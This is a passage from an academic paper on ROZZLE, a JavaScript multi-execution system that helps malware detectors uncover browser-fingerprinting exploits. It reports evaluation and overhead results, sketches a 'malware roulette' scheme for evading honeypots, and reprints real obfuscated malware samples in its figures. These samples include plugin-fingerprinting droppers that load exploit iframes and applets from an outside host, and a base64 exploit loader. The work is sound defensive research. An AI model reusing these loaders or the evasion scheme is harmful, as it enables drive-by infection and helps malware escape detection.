on 225 URLs and 156 new ZOZZLE detections in the second run. To better understand this result and test to what degree ROZZLE was able to reveal new detections, we manually verified a subset of URLs constituting $1,540/1,557$ ZOZZLE and $31/120$ NOZZLE detections in the base and ROZZLE second (ROZZLE) runs, respectively. For NOZZLE, $2/9$ missed detections were caused by the server not serving an exploit during the second run, and are not the fault of ROZZLE.

In the other 7 cases, handling of symbolic variables caused errors during script execution. We discuss the problem of error handling in the context of ROZZLE in Section VII-A. For ZOZZLE, 60 detections were missing in the ROZZLE-enabled run. In 44 cases, the exploit was not served during the second analysis run and, like above, the failure to detect is not the fault of ROZZLE. In 5 cases, our system caused an error during JavaScript execution, stopping the exploit from being unpacked or being downloaded and resulting in a missing ZOZZLE detection. In additional 11 cases, the script caused an error at runtime. Although it is not clear whether ROZZLE has any impact on these code snippets, we conservatively assume that the errors are caused by the multi-path execution. As we discard missing detections in the repeated analysis runs, we also need to verify new detections when using ROZZLE to allow for a fair comparison. On this data set, we tried answering another interesting question: In cases where we see a new NOZZLE detection, did we already cover this URL previously through a ZOZZLE detection? Or, in other words, do we find previously undetected malware URLs that the system would have missed without ROZZLE? We found that in 90 cases, ROZZLE triggered a NOZZLE detection whereas in the base run neither NOZZLE nor ZOZZLE detected the malicious script. Likewise, in 156 cases ZOZZLE flagged the URL as malicious although it had not been detected by either system previously. Last, there are 76 new NOZZLE detections that are not flagged by ZOZZLE and 142 new ZOZZLE detections that are not flagged by NOZZLE. Figure 16 summarizes these results. One can see that ROZZLE was successful in finding new detections in 232 cases, and with both detectors contributing.

### C. Performance Overhead of ROZZLE

Memory and CPU consumption are key factors in determining the number of client honeypots that can be run simultaneously on a single host. Thus, the overhead introduced by our system plays an important role.

**Setup:** To measure this impact, we conducted two experiments summarized in Figures 17(a) and 17(b).For the first experiment, we run a set of 500 randomly selected URLs from the list selected for the *online* evaluation described above. We chose this set of URLs as it is a representative sample of URLs that we expect to be using while running our system in the future. For the second experiment, we used SPIDERMONKEY to get a feeling for the performance impact of sites relying on heavy JavaScript computations. To measure the performance impact we proceed as follows: We added callbacks into the JavaScript framework to signal whenever a context is about to be executed and after execution has finished. This way we are able to directly see the slowdown caused by ROZZLE. Note that while we are only measuring the time within the JavaScript runtime, many other factors contribute to the overall performance, and the overall impact on the end-to-end throughput is significantly less than shown here.

For measuring the memory footprint of ROZZLE, we use a similar approach: we used hooks in the allocation of JavaScript objects as well as the garbage collector to be notified about allocation/de-allocation events. In both memory as well as runtime measurement, we analyzed each URL three times sequentially for each case and we report the minimum as well as average numbers. However, simply repeating analysis runs does not provide that reliable numbers: We noticed that script execution times varied heavily, often due to different content being loaded per visit (such as advertisements) or special cookie initialization code upon the first visit. To compensate for this, we visited each URL one additional time for script setup purposes and discarded this run from any calculation. Additionally, we counted the number of script contexts, number of function invocations, as well as unique functions called per URL. Whenever the ROZZLE-enabled run showed fewer script contexts or considerably fewer function invocations or called functions, we discarded the URL from analysis, assuming the site contained nondeterministic script inclu-

sions or ROZZLE caused execution to abort prematurely (and would thus skew results).

**Results:** Figure 17(a) summarizes results for the measured memory footprint, while Figure 17(b) shows the impact of ROZZLE on execution speed. The figures show distributions of observed overhead overheads on the y-axis, with the measured relative overhead plotted on the x-axis. X-axis numbers greater than 1 indicate slower execution and more memory. Note that the CPU overhead only measures the overhead of ROZZLE with respect to the IE9 Chakra JavaScript runtime. The performance of the rest of the browser remains unaffected. The figures both show that for the vast majority of web sites, the performance and memory impact of ROZZLE is 0, which matches our earlier measurements indicating that few websites make references to the environment or execute conditionally based on environment values. From these distributions, the median CPU overhead is 0% and the 80th percentile is 1.1%. The median memoory overhead is 0.6% and the 80th percentile is 1.4%. We also see that in a small number of cases that there are performance outliers where the memory and CPU overhead is larger, up to a factor of two. As a result, the average overhead is slightly higher: the CPU overhead averages 10% and the memory overhead of using ROZZLE is 3% on average. Since the JavaScript runtime is only a fraction of the total CPU and memory overhead in a modern browser, we consider these performance results to be acceptable for offline malware scanning and also even potentially usable for in-browser scanning as well.



(a) ROZZLE Memory overhead.



(b) ROZZLE Performance overhead.

**Fig. 17:** Distributions of relative memory and CPU JavaScript engine overhead. Larger numbers imply more memory and slower execution time.

## VI. Attack scenario

In our research on ROZZLE, we have observed that while the majority of exploits we find in the wild are pretty naïve about detection avoidance, we do see examples of malware are increasingly difficult to detect without techniques presented here. One such example is shown in Figure 19; others are presented in Appendix A.

These examples inject the malware *after* fingerprinting the browser. While we currently see this technique used to deliver malware customized to the browser or plugin versions, it is easy to imagine similar fingerprinting used to avoid offline detection, as shown in Figure 2.

In this section, we present an approach to malware construction we dubbed *malware roulette* that is designed to avoid detection. Malware roulette can be thought of as a rewriting pass that may be applied to a given piece of malware to avoid detection.

The key principle is as follows: we take a JavaScript program represented as a set of functions with control flow graphs (CFGs) and convert each CFG into a network request with, request parameters encoding the state of the program at this point in the call graph.

**Example 1** Specifically, considering a CFG with three basic blocks

```
var x = 3;           // BB1
var y = 5;

if(navigator.userArent.indexOf("safari") > 0){
    y = 7;           // BB2
}

x = 2;               // BB3
```

In this code, there are only two paths to consider: path 1 consisting of BB1 → BB2 → BB3 and path 2: BB1 → BB3.

At the entry to BB2, we would issue a call to `roulette.php?x = 3&y = 5&BB = 2`, at the transition from BB2 to BB3, we would issue a call to `roulette.php?y = 7&BB = 3`, and at the end of BB3, we would issue a call to `roulette.php?x = 2&BB = −1`. In other words, the effect of each basic block is contained in the variables passed around to the subsequent call to `roulette.php`. The job of the roulette "driver", `roulette.php` is to send the JavaScript code for the upcoming basic block to the client.

These ideas can serve as a basis for an avoidance technique:

- In particular, we can make it so that the snippet that is shipped to the client in each case is quite small,



**Fig. 18:** Exploit state machine.

limited either by the size of a basic block, or even smaller, since we can break up lengthy basic blocks into smaller ones. For a static detector such as ZOZZLE, of course, the smaller the visible chunk is, the more challenging it is to get detected.

- Fingerprinting code will be made more difficult to detect as well. Currently, fingerprinting code is often grouped together such as in Figure 3, which makes it possible to train static classifiers to detect fingerprinting. Breaking this code up would hampered this kind of detection as well.

**Example 2** To validate the feasibility of this technique, we have transformed one exploit found during our experiments with ZOZZLE as shown in Figure 18.

The sample we use for this experiment performs three consecutive checks on the environment: First, the underlying browser is tested for Internet Explorer 6. Then, the code tries to instantiate ActiveX-plugins for handling PDF content from different vendors. Depending on the type of plugin that is available, the script uses different code for identifying the plugin version. Eventually, if this version matches a set of vulnerable candidates, a vendor-specific exploit is executed on the client browser.

The code paths to launching an exploit can be represented as a state machine (see Figure 18). States represent (sub-)queries on the environment (generation of a specific fingerprint), transformations are equivalent to checks (comparing a fingerprint against an expected value). Final states include launches of a specific exploit or 'no action', if the environment does not appear vulnerable (against any of the exploits available). □

Using this state machine, we can re-write the example script into a series of redirects to hide from traditional client-side honeypots: In each state, a small script extracts the necessary information (e.g., the browser version) and

submits it to the remote server. In turn, the attacker redirects the browser depending on the submitted data: If the extracted information does not fulfill any path constrains leading to a possible exploit state, the browser is redirect to a benign site to avoid raising suspition. Otherwise, the attacker redirects to a server under her control to proceed in the roulette. Eventually, a server delivers the actual exploit to the requesting browser.

When visiting our system with a *traditional* client honeypot, the attacker can successfully hide her malicious intent in the majority of cases. This is because most code implementing the redirection logic is hidden on the server. Only if the honeypot implements the correct browser profile, it is able to reach one of the exploit states and see the actual exploit code (and detect that the site is malicious).

Executing the individual pieces of code in ROZZLE leads to a different outcome: As described above, fingerprint information collected within the individual states is treated as symbolic by our system. Thus, using it when building a request triggers resolving of concrete value candidates, and ROZZLE uses all available profiles to generate a set of request candidates. This way, the system is able to explore the state machine and eventually reach one of the exploit states.

We used our high-interaction honeypot described in Section V to test this assumption: As expected, without ROZZLE, the client was redirected to the benign site after a few checks (states). With the ROZZLE-enhanced version, however, we were able to navigate through the redirects and flag the servers as malicious.

## VII. Discussion

In this section we discuss limitations of ROZZLE, including ways that attackers can avoid it, as well as considering malware trends that are likely to impact other forms of static and dynamic detection.

### A. Limitations

As with any detection tool, we need to consider ways that a determined attacker can avoid being detected by systems using ROZZLE. Avoidance approaches fall into three categories: hiding the decision making from the client, detecting that ROZZLE is being used and/or thwarting it, and avoiding the detection techniques that ROZZLE enhances. We consider each in turn.

**Server-side cloaking:** ROZZLE only protects against client-side cloaking attempts. It is not useful against server-side techniques such as IP black-listing, etc. In particular, a determined attacker can construct a fingerprint of the client-side environment and send it to the server, which in the response would direct the client in various ways depending on the configuration. Such behavior is itself quite suspicious (the server is unlikely to need to know all the details of the client configuration) and could perhaps be detected as potentially malicious.

**Breaking existing code:** It is not not entirely surprising that in certain circumstances ROZZLE may lead to runtime errors because we execute infeasible paths. In particular, this often occurs when the program checks the user agent and then instantiates an object specific to that browser. While it is possible to provide mock-ups (or emulation) for this missing functionality, and we do that in a limited set of cases, our emulation is not exhaustive.

Similarly, aggressive execution of otherwise infeasible paths may lead to both a explosion of both the memory size because of the growth of symbolic values in the heap, as well as the time required to multi-execute the program, if sufficiently many nested conditionals are present. In practice the measurements in Section V show that these factors rarely impact performance, in part due to the symbolic value compression mentioned in Section IV-B.

**Identifying that ROZZLE is enabled:** It is difficult to hide the fact that ROZZLE is used within the browser, because of functional differences in execution as well as changed timing characteristics, etc. As a result, client code that detects the presence of ROZZLE can avoid delivering the payload in that case. A specific case of this approach would be to construct a denial-of-service attack against ROZZLE-enabled browsers: knowing the algorithm that ROZZLE uses, an attacker could construct a program that caused ROZZLE to run out of memory, CPU, etc.

### B. Emergence of Better Malware Cloaking

While our results show that our current static malware detector is quite effective without ROZZLE enhancement, we have also observed numerous cases of real malware that are resistant to static detection. Figure 19 shows a real-life example of malware that injects `iframe`-based payloads based on fingerprinting results computed on the client. While we hypothesized the existence of such malware and described the general approach its creation in Section VI, finding this malware in the wild validates our belief that such approaches need to be defended against. This example is one of the significant number of new runtime detections found with the help of ROZZLE, as described in Section V. On lines 3 and 6, exploit code for IE 6 and 7 is included, respectively. Line 14 includes Flash-specific code. Finally, line lines 23 and 24 include code specific to ActiveX object `OWC10.Spreadsheet`. More examples of this kind can be found in Figures 20–25.

### VIII. RELATED WORK

Given the prevalence of malicious sites on the Internet and the threat of malicious software in general, malware research has received much attention in recent years. In this section, we summarize related work and compare it to ROZZLE.

### A. Symbolic Execution

Symbolic execution was initially introduced by King [28] and has since been used in a number of different research

```
1  if (navigator.userAgent.toLowerCase().indexOf(
2      "\x6D"+"\x73\x69\x65"+"\x20\x36") > 0)
3          document.write("<iframe src=x6.htm></iframe>");
4  if (navigator.userAgent.toLowerCase().indexOf(
5      "\x6D"+"\x73"+"\x69"+"\x65"+"\x20\x37") > 0)
6          document.write("<iframe src=x7.htm></iframe>");
7  try {
8      var a;
9      var aa = new ActiveXObject(
10         "Sh"+"ockw"+"av"+"e"+"Fl"+[...]);
11 } catch(a) { } finally {
12     if (a!="[object Error]")
13         document.write("<iframe src=svfl9.htm></iframe>");
14 }
15 try {
16     var c;
17     var f = new ActiveXObject(
18         "O"+"\x57\x43"+"\x31\x30\x2E\x53"+[...]);
19 } catch(c) { } finally {
20     if (c!="[object Error]") {
21         aacc = "<iframe src=of.htm></iframe>";
22         setTimeout("document.write(aacc)", 3500);
23     }
24 }
```

**Fig. 19:** Real-life malware roulette.

areas such as program testing and malware analysis. Most work can be classified into techniques working either online (using symbolic execution at runtime) versus offline (executing a piece of code in a verbose manner and using symbolic execution to analyze the generated log-files).

Moser *et al.* [39] use online symbolic execution of native x86 code to detect new code paths in malware binaries. To this end, similar to our system, they use taint-tracing of environment-provided values (such as the current time) throughout the execution of the malicious binary and record execution of conditional paths that depend on these values. At a later point (e.g., when the sample terminates), they revert to a particular state in the execution and choose to execute a previously untaken conditional branch, updating all variables that are influenced by the inverted branch condition. Concurrently with Moser *et al.*, Brumley *et al.* propose MINESWEEPER [8], a tool to detect trigger-based behavior in malware binaries. Here, the authors describe a similar approach to extract conditions from native code when certain code paths are executed. ROZZLE works in a completely different environment (JavaScript vs. native x86 code) and, thus, requires far greater power to reason on symbolic constraints. For example, the system proposed by Moser *et al.* is limited to resolving constraints that have a linear dependency on tainted values to assure a consistent state update when reverting. Our system supports arbitrary data- and control dependencies, as well complex string manipulations, which are essential in the context we operate in. In addition, our system does not depend on reverting to a particular state in the execution trace to improve code coverage and instead tries to execute all possible paths within a single execution trace. This provides more efficient analysis and avoids some of the problems related with space explosion.

Other research has concentrated on offline symbolic execution. Here, a program is executed using (potentially

```
1  document.write(
2      "<div style=\"position:absolute; left:-1000px; top:-1000px;\">");function i73(a){document.write("<iframe
3      src=\"http://ccx.org.ru/move/quotation10.php?s=wJ92udOy&id="+a+"\"></iframe>");}LPf=0; function ek13(){return
4      true;}window.onerror=ek13;function n73(a){var
5      k,s,i;if(navigator.mimeTypes.length&&(k=navigator.plugins))for(i=0;i<k.length;i++){
6      s=k[i].name;if(s.indexOf(a)>=0)return k[i];}return 0;}if(navigator.javaEnabled())
7      document.write("<applet
8      code=\"zzz.ttt.ad3740b4.class\" archive=\"http://ccx.org.ru/move/quotation10.php?s=wJ92udOy&id=6\" width=300
9      height=300><param name=\"data\" value=\"http://ccx.org.ru/move/quotation10.php?s=wJ92udOy&id=14&\"><param name=\"cc\"
10     value=\"1\"></applet>");zJWX=0;try{zJWX=new ActiveXObject("AcroPDF.PDF");}catch(e){if(!zJWX)try{zJWX=new
11     ActiveXObject("PDF.PdfCtrl");}catch(e){if(zJWX){var
12     lv=((zJWX.GetVersions().split(","))[4].split("="))[1].replace(/\./g,"");zJWX=(lv<900)&&(lv!=813);}else zJWX=n73("Adobe
13     A")||n73("Adobe P");if(zJWX)i73(2);document.write("</div>");
```

**Fig. 21:** Precise fingerprinting of the PDF plugin and its version. Conditional code inclusion for PDF and Java exploit is shown.

```
1  document.write("<div style=\"position:absolute; left:-1000px;
2      top:-1000px;\">");function i73(a){document.write("<iframe
3      src=\"http://ccx.org.ru/move/quotation10.php?s=wJ92udOy&id="+a+"\"></iframe>");} LPf=0; function ek13(){return
4      true;}window.onerror=ek13;function n73(a){var k,s,i;if(navigator.mimeTypes.length&&(k=navigator.plugins))
5      for(i=0;i<k.length;i++){s=k[i].name;if(s.indexOf(a)>=0)return k[i];}return
6      0;}if(navigator.javaEnabled())document.write("<applet code=\"zzz.ttt.ad3740b4.class\"
7      archive=\"http://ccx.org.ru/move/quotation10.php?s=wJ92udOy&id=6\" width=300 height=300><param name=\"data\"
8      value=\"http://ccx.org.ru/move/quotation10.php?s=wJ92udOy&id=14&\"><param name=\"cc\"
9      value=\"1\">");zJWX=0;try{zJWX=new ActiveXObject("AcroPDF.PDF");}catch(e){if(!zJWX)try{zJWX=new
10     ActiveXObject("PDF.PdfCtrl");}catch(e){if(zJWX){var
11     lv=((zJWX.GetVersions().split(","))[4].split("="))[1].replace(/\./g,""); zJWX=(lv<900)&&(lv!=813);}else zJWX=n73("Adobe
12     A")||n73("Adobe P");if(zJWX)i73(2);document.write("</div>");
13
```

**Fig. 22:** Precise fingerprinting of the PDF plugin and its version. Conditional code inclusion for PDF and Java exploit. There is additional checks for Safari that don't seem to be used at the moment.

multiple) inputs and the execution trace is recorded. Based on these traces, systems have been proposed for a wide variety of purposes: Godefroid *et al.* introduce SAGE [23] and use symbolic execution to generate hostile inputs used in fuzz testing that explore previously unhandled code paths. Cadar *et al.* propose a similar system (EXE [12]) that finds programming errors and automatically generates inputs that trigger the buggy code region. Costa *et al.* [16] analyze buggy programs to find control-flow conditions that lead to a successful attack. Brumley *et al.* use symbolic execution to extract formulas representing different protocol implementations [7]. These differences can indicate an incorrect protocol implementation or raise opportunity to fingerprint a remote application. In [1], Avgerinos *et al.* extend KLEE [11] and propose a system for automatically finding programming errors in binary programs as well as generating a working exploit. Similar to KLEE, other systems have proposed using symbolic execution for finding bugs in software [38, 45, 61, 62, 66, 68].

ROZZLE differs from these systems as it is designed to be used in an online, real-time manner. Thus, it is limited in resolving the feasibility of conditions, which typically takes a considerable amount of time. Instead, we have invested much effort into supporting parallel, multi-profile execution using conditional memory. Only in situations where we require concrete values, we resolve conditional memory on demand.

### B. JavaScript Analysis

With the growing popularity of client-side in-browser applications, JavaScript analysis has recently gained much attention from an industry as well as research perspective.

Cova *et al.* present JSAND [17] to analyze and classify web content based on static and dynamic features. Their system provides a framework to emulate JavaScript code and determine characteristics that are typically found in malicious code. Such characteristics include code obfuscation, environment preparation, and exploitation techniques. In [48], Ratanaworabhan *et al.* present NOZZLE, a dynamic system that uses a global heap health metric to detect heap-spraying, a common technique used in modern browser exploits. In [18], the authors present a mostly static analysis engine called ZOZZLE. This system uses a naive bayes classifier to finding instances of known, malicious JavaScript [18].

These systems' goals are orthogonal to those presented in this paper. Combining them with ROZZLE can improve detection results, and, in fact, we extended two of these systems (NOZZLE and ZOZZLE) to evaluate our system (see Section V). Similarly, JSAND could benefit from our system, as its dynamic features are currently limited to a single-profile execution. WebPatrol [15] aids the security analysis of obfuscated, malicious webpages. It allows one to collect and replay an infection scenario, which reduces the number of requests required by repeated analysis of a given URL. However, it can only cache results it has seen during its initial analysis, and, thus, the system cannot handle content for a particular, fingerprinted browser instance potentially required in our analysis scenario.

Other systems focus on vulnerability analysis and validation of code in a benign context. In [5], the authors describe NOTAMPER, a tool that analyzes validation routines written in JavaScript. Using a black-box approach, NOTAMPER checks server-side code to find missing or

```
1  document.write("<iframe src=silver.htm width=125 height=1></iframe>");
2      if (navigator.userAgent.toLowerCase().indexOf("\x6D" + "\x73\x69\x65" + "\x20\x36") > 0) document.write("<iframe
3      width=129 height=111 src=x6.htm></iframe>"); if (navigator.userAgent.toLowerCase().indexOf("\x6D" + "\x73" + "\x69"
4      + "\x65" + "\x20" + "\x37") > 0) document.write("<iframe src=x7.htm width=129
5      height=111></iframe>");document.write("<iframe src=fox.htm width=125 height=1></iframe>");
```

**Fig. 23:** Pulling in new contexts depending on the browser version.

```
1  try {
2      var c;
3      var f = new ActiveXObject("O" + "\x57\x43" + "\x31\x30\x2E\x53" + "pr" + "ea" + "ds" + "he" + "et");
4  } catch (c) {};
5  finally {
6      if (c != "[object Error]") {
7          aacc = "<iframe src=of.htm width=111 height=111></iframe>"
8          setTimeout("document.write(aacc)", 3500);
9      }
10 }
```

**Fig. 24:** Pulling in new contexts depending on the browser version.

inconsistent validation checks. Jang *et al.* [25] do an empirical study on information flows inside JavaScript applications to detect privacy-violating behavior. Saxena *et al.* [51] propose a system called FLAX that uses "taint enhanced blackbox fuzzing" to find command and code injection vulnerabilities in JavaScript.

A system closely related to ROZZLE is KUDZU [50]. In their paper, Saxena *et al.* present a symbolic execution framework for JavaScript that can be used to explore all paths inside a script body. Similar to FLAX, the goal of KUDZU is to detect client-side code inclusion vulnerabilities. For this, the tool builds symbolic representations of all variables in the code and, when it encounters a branch instruction, solves these symbolic formulas. Additionally, they explore GUI-triggered code paths ("event space") by invoking a random sequence of event handlers. The approach used by KUDZU does not scale to our application scenario, however. As mentioned above, ROZZLE cannot rely on constantly resolving all dynamic formulas due to the strict analysis performance requirements. Additionally, our tool needs to be optimized for analyzing potentially malicious pages, dealing with evasive techniques and heavy code obfuscation. Last, we do not require a GUI exploration technique, as malicious websites typically do not want to rely on user-input to start the exploitation. If we encounter such requirements in the future, we can adopt a similar technique as described by Saxena *et al.*.

### C. Environment Fingerprinting

Malicious code frequently uses fingerprinting to gather information on a target host. This information is then used to accommodate to differences in the execution environment, to launch exploits specific to the host, or deter execution inside an analysis system.

Fingerprints can be extracted from a variety of sources. For instance, attackers use information from the network layer [29, 54] to identify software components running on a remote target. This information greatly reduces the attack vectors and improves changes of a successful exploit.

Another data source is the underlying CPU architecture. In [13], the authors present a system for building binaries that identify the CPU using semantic differences of individual opcodes. This way, programs are able to execute different behavior depending on the execution environment. Balzarotti *et al.* present a system [2] to detect "split personalities" in malware. Its aim is to detect programs showing CPU-dependent behavior intended to evade analysis inside sandboxes such as ANUBIS [3] or CWSANDBOX [63].

In [19, 20], the author describe PANOPTICLICK, a system for identifying the uniqueness of a particular browser configuration. The author argues that the fingerprint of most configurations are unique and might be used to track individual users browsing the web. Mowery *et al.* [41] extend this idea and identify browser version, operating system, as well as the underlying CPU model without the use of APIs offered by the JavaScript engine. More precisely, they generate fingerprints from JavaScript performance benchmarks or by exploiting the popular NoScript plugin [32]. While these techniques are related to our system, the domain is very different.

### D. Malware Detection

Throughout the evaluation of ROZZLE (see Section V) we discovered malicious pages on the Internet. A number of other researchers have proposed different solutions to discovering "bad neighborhoods" on the web. Typically, these studies [37, 40, 46, 47, 52, 70] rely on a combination of high- and low-interaction client honeypots to visit a large number of sites, detecting suspicious behavior in environment state after being compromised. Nazario and Song *et al.* recognized the divergence of needed browser plugins and proposed methods around ActiveX emulation to grow the attack surface of client honeypots [44, 55]. Hu *et al.* [24] study redirection botnets using changing attributes of DNS information over time. In [57] Stokes *et al.* propose a bottom-up fashion for finding websites serving malicious binaries or drive-by exploits by following in-links

```
1  try {
2      var a;
3      var aa = new ActiveXObject(
4          "Sh" + "ockw" + "av" + "e" + "Fl" + "a" + "s" + "h.S" + "ho" + "ckw" + "aveF" + "las" + "h");
5  } catch (a) {};
6  finally {
7      if (a != "[object Error]") {
8          document.write("<iframe width=111 height=111 src=svfl9.htm></iframe>");
9      }
10  }
```

**Fig. 25:** Pulling in new contexts depending on some flash-plugin version.

on exploit sites found through AV software to connected landing sites.

Often, authors of malicious websites make use of automated poisoning of search engine results to increase the number of potential victims directed to their site [30]. To avoid being detected and in turn being deleted from the search index, they make use of cloaking to conceal the true, malicious intent of the webpage. Previous work [64] has studied the prevalence of different types of cloaking using the similarity of links and terms in documents. In [31], the authors extend this idea by adding tags found in a website to improve detection of cloaked web pages.

ROZZLE extends this direction of research. While we also aim to detect suspicious sites on the web, our evaluation shows that our system is able to expose more malicious activity than existing techniques using vulnerable, virtualized environments. At the same time, our multi-profile, in-browser interpretation of JavaScript requires fewer resources and reduces load on the crawled web sites.

Similar to the discovery of previously unseen malicious pages on the web is the idea of finding new behavior in malicious binaries. To this end, systems using static, dynamic, or a combination of both approaches have been proposed [26, 33, 36, 42, 43, 49]. Our system is similar in the sense that we also try to discover new malicious code. However, the application domain (malicious JavaScript) as well as the form of protection (client-side fingerprinting) are somewhat different.

## IX. Conclusions

In the last several years, we have seen mass-scale exploitation of memory-based vulnerabilities migrate towards drive-by attacks delivered through the browser. With millions of infected URLs on the internet, JavaScript malware now constitutes a major threat to everyday computer use.

While both static and runtime methods for malware detection been both proposed in the research literature, both on the client side, for just-in-time in-browser detection, as well as offline, honeymonkey-style malware discovery, these approaches encounter the same fundamental limitation. Web-based malware tends to be environment-specific, targeting a particular browser, often with specific versions of installed plugins. This is because the exploits will often only work on specific plugins and crash otherwise. As a

result, a fundamental limitation for *detecting* a piece of malware is that malware is only triggered occasionally, given the right environment. In fact, we observe that using current *fingerprinting* techniques, just about any piece of existing malware may be made virtually undetectable with the current generation of malware scanners.

This paper proposes a JavaScript *multi-execution* technique to explore multiple execution paths in parallel as a way to make environment-specific malware reveal itself. We experimentally demonstrate that, when used for static online detection, ROZZLE finds an additional 5.6% of malicious URLs, indicating that currently malware does not yet use sophisticated cloaking techniques to hide itself from our detector. ROZZLE increases the detection rate for *offline* runtime detection by almost seven times. Finally, ROZZLE triples the effectiveness of online runtime detection with minimal overhead.

Moreover, ROZZLE offer linear savings to harware requirements, network bandwidth, and power consumption.

### Acknowledgments

The authors would like to thank Paul Rebriy, Kelly You, and David Felstead for their encouragement, insight, and support throughout this project.

## Appendix

Figures 20–25 show representative examples of real-life malware cloaking found by comparing the findings of a dynamic malware detector when run with and without ROZZLE.

## References

[1] T. Avgerinos, S. K. Cha, B. L. T. Hao, and D. Brumley. AEG: Automatic exploit generation. In *Network and Distributed System Security Symposium*, Feb. 2011.

[2] D. Balzarotti, M. Cova, C. Karlberger, C. Kruegel, E. Kirda, and G. Vigna. Efficient Detection of Split Personalities in Malware. In *Proceedings of the Network and Distributed System Security Symposium*, February 2010.

[3] U. Bayer, C. Kruegel, and E. Kirda. TTAnalyze: A Tool for Analyzing Malware. In *Annual Conference of the European Institute for Computer Antivirus Research (EICAR)*, 2006.

[4] K. Bhargrava, D. Brewer, and K. Li. A study of URL redirection indicating spam. In *Proceedings of the Conference on Email and Anti-Spam*, 2009.

[5] P. Bisht, T. Hinrichs, N. Skrupsky, R. Bobrowicz, and V. N. Venkatakrishnan. NoTamper: automatic blackbox detection of parameter tampering opportunities in web applications. In *ACM Conference on Computer and Communications Security*, pages 607–618, 2010.

```
1  function SetCookie(name, value) {
2      var Days = 30;
3      var exp = new Date();
4      exp.setTime(exp.getTime() + Days *
5          24 * 60 * 60 * 1000);
6      document.cookie = name + "=" + escape(value) + ";
7      expires=" + exp.toGMTString();
8  }
9
10 function getCookie(name) {
11     var arr = document.cookie.match(
12         new RegExp("(^| )" +
13             name + "=([^;]*)(;|$)"));
14     if (arr != null) return unescape(arr[2]);
15     return null;
16 }
17
18 var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcd...";
19
20 function decode64(input) {
21     var output = "";
22     var chr1, chr2, chr3 = "";
23     var enc1, enc2, enc3, enc4 = "";
24     var i = 0;
25     if (input.length % 4 != 0) {
26         return "";
27     }
28     var base64test = /[^A-Za-z0-9+\/\=]/g;
29     if (base64test.exec(input)) {
30         return "";
31     }
32     do {
33         enc1 = keyStr.indexOf(input.charAt(i++));
34         enc2 = keyStr.indexOf(input.charAt(i++));
35         enc3 = keyStr.indexOf(input.charAt(i++));
36         enc4 = keyStr.indexOf(input.charAt(i++));
37         chr1 = (enc1 << 2) | (enc2 >> 4);
38         chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
39         chr3 = ((enc3 & 3) << 6) | enc4;
40         output = output + String.fromCharCode(chr1);
41         if (enc3 != 64) {
42             output += String.fromCharCode(chr2);
43         }
44         if (enc4 != 64) {
45             output += String.fromCharCode(chr3);
46         }
47         chr1 = chr2 = chr3 = "";
48         enc1 = enc2 = enc3 = enc4 = "";
49     } while (i < input.length);
50     return output;
51 }
52
53 var s = "PHNjcmlwdD4NCg0KdmFyIHNjIDOgdW5lc2NhcGUoIiV1...";
54
55 if (navigator.userAgent.indexOf("MSIE 6") != -1) {
56     if (getCookie('qtr') == null) {
57         document.write(decode64(s));
58         SetCookie('qtr', '1');
59     }
60 }
```

**Fig. 20:** Check for IE version and decode + `eval` only if we are running IE 6. There is an additional check using a cookie to run the exploit only once every 30 days.

[6] N. Bjorner, P. Hooimeijer, B. Livshits, D. Molnar, and M. Veanes. Symbolic finite state transducers: Algorithms and applications. Technical Report MSR-TR-2011-85, Microsoft Research, July 2011.

[7] D. Brumley, J. Caballero, Z. Liang, J. Newsome, and D. Song. Towards automatic discovery of deviations in binary implementations with applications to error detection and fingerprint generation. In *In Proceedings of the Usenix Security Symposium*, 2007.

[8] D. Brumley, C. Hartwig, Z. Liang, J. Newsome, D. Song, and H. Yin. Automatically identifying trigger-based behavior in malware.

[9] D. Brumley, C. Hartwig, Z. Liang, J. Newsome, D. Song, and H. Yin. Automatically identifying trigger-based behavior in malware. Technical report, Carnegie Mellon University, 2007.

[10] R. E. Bryant. Symbolic boolean manipulation with ordered binary decision diagrams. *ACM Computing Surveys*, 24(3):293–318, Sept. 1992.

[11] C. Cadar, D. Dunbar, and D. R. Engler. Klee: Unassisted and automatic generation of high-coverage tests for complex systems programs. In *OSDI*, pages 209–224, 2008.

[12] C. Cadar, V. Ganesh, P. M. Pawlowski, D. L. Dill, and D. R. Engler. Exe: automatically generating inputs of death. In *Computer and Communications Security*, pages 322–335, 2006.

[13] S. K. Cha, B. Pak, D. Brumley, and R. J. Lipton. Platform-independent programs. In *Proceedings of the Conference on Computer and Communications Security*, Oct. 2010.

[14] K. Chellapilla and A. Maykov. A taxonomy of JavaScript redirection spam. In *AIRWeb*, 2007.

[15] K. Z. Chen, G. Gu, J. Nazario, X. Han, and J. Zhuge. Web-Patrol: Automated collection and replay of web-based malware scenarios. In *Proceedings of the Asian Symposium on Information, Computer, and Communication Security*, March 2011.

[16] M. Costa, J. Crowcroft, M. Castro, A. I. T. Rowstron, L. Zhou, L. Zhang, and P. Barham. Vigilante: End-to-end containment of internet worm epidemics. *ACM Trans. Comput. Syst.*, 26(4), 2008.

[17] M. Cova, C. Kruegel, and G. Vigna. Detection and analysis of drive-by-download attacks and malicious JavaScript code. In *Proceedings of the International World Wide Web Conference*, Raleigh, NC, April 2010.

[18] C. Curtsinger, B. Livshits, B. Zorn, and C. Seifert. Zozzle: Low-overhead mostly static JavaScript malware detection. In *Proceedings of the Usenix Security Symposium*, Aug. 2011.

[19] P. Eckersley. How unique is your web browser? In *Privacy Enhancing Technologies*, pages 1–18, 2010.

[20] P. Eckersley. Panopticlick. http://panopticlick.eff.org/, 2011.

[21] M. Fahndrich and R. DeLine. Adoption and focus: practical linear types for imperative programming. In *Proceedings of the ACM SIGPLAN 2002 Conference on Programming language design and implementation*, PLDI '02, pages 13–24, New York, NY, USA, 2002. ACM.

[22] J. Giles. Scareware: the inside story. *The New Scientist*, 205, Mar. 2010.

[23] P. Godefroid, M. Y. Levin, and D. A. Molnar. Automated whitebox fuzz testing. In *Network and Distributed System Security Symposium*, 2008.

[24] X. Hu, M. Knysz, and K. G. Shin. RB-Seeker: Auto-detection of redirection botnets. In *Network and Distributed System Security Symposium*, 2010.

[25] D. Jang, R. Jhala, S. Lerner, and H. Shacham. An empirical study of privacy-violating information flows in JavaScript web applications. In *Proceedings of the Conference on Computer and Communications Security*, pages 270–283, 2010.

[26] M. G. Kang, P. Poosankam, and H. Yin. Renovo: A hidden code extractor for packed executables. In *workshop on rapid malcode*, 2007.

